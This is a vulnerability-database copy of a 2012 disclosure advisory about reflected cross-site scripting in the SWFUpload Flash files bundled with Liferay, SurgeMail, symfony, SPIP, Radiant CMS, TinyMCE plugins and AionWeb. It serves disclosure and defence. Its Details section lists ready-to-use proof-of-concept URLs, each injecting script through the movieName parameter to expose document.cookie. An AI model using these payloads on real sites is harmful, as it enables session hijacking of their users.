Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

swfupload_f8.swf Cross Site Scripting

🗓️ 21 Nov 2012 00:00:00Reported by MustLiveType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 65 Views

Cross site scripting vulnerability in web applications using swfupload_f8.swf for Flash Player 8, affecting various plugins and systems like Archiv plugin for TinyMCE, Squeeze Documents for SPIP, and Upload Manager for Radiant CMS

Code
`Hello list!  
  
I will draw your attention to XSS vulnerability in other web applications  
with swfupload. Earlier I've wrote about swfupload in AionWeb, Magento,  
Liferay Portal, SurgeMail, symfony and that this hole is available in many  
other web applications.  
  
In previous letters I've wrote concerning web applications with  
swfupload.swf and swfupload_f9.swf (which are for Flash Player 10 and Flash  
Player 9). And now I'll write about web applications with swfupload_f8.swf  
(which is for Flash Player 8). Here is information about Archiv plugin for  
TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,  
AionWeb, Liferay Portal (Community Edition, which earlier called Standard  
Edition, and Enterprise Edition), SurgeMail, symfony - among multiple web  
applications which are bundled with swfupload_f8.swf.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are potentially all versions of Archiv plugin for TinyMCE,  
Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay  
Portal (Community Edition, which earlier called Standard Edition, and  
Enterprise Edition), SurgeMail, symfony. There is no information that they  
have fixed this vulnerability in their software (at that this vulnerability  
was fixed in WordPress 3.3.2 at 20.04.2012).  
  
The developers of WordPress released new version of flash file (the same did  
the developers of XenForo), which could be used by all web developers, which  
were using swfupload. But in WordPress and XenForo the swfupload.swf was  
fixed, not swfupload_f8.swf and these are different versions of the same  
flash application (designed for different versions of Flash Player). Taking  
into account current wide spreading of Flash Player 10.x and 11.x, then  
developers of these web applications could replace swfupload_f8.swf with new  
fixed version of Swfupload.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
Archiv plugin for TinyMCE:  
  
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Squeeze Documents for SPIP:  
  
http://site/plugins_spip/squeeze_documents/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/plugins_spip/squeeze_documents/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Upload Manager for Radiant CMS:  
  
http://site/public/swfupload/Flash8/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/public/swfupload/Flash9/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
AionWeb:  
  
http://site/engine/classes/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
AionWeb also contains swfupload_f8.swf, besides described earlier  
swfupload.swf and swfupload_f9.swf.  
  
Liferay Portal:  
  
http://site/html/js/misc/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Liferay Portal also contains swfupload_f8.swf, besides described earlier  
swfupload_f9.swf.  
  
SurgeMail:  
  
http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
SurgeMail also contains swfupload_f8.swf, besides described earlier  
swfupload.swf and swfupload_f9.swf.  
  
symfony:  
  
http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
symfony also contains swfupload_f8.swf, besides described earlier  
swfupload_f9.swf.  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Nov 2012 00:00Current
cross site scriptingswfupload_f8.swfflash player 8tinymcespipradiant cms
65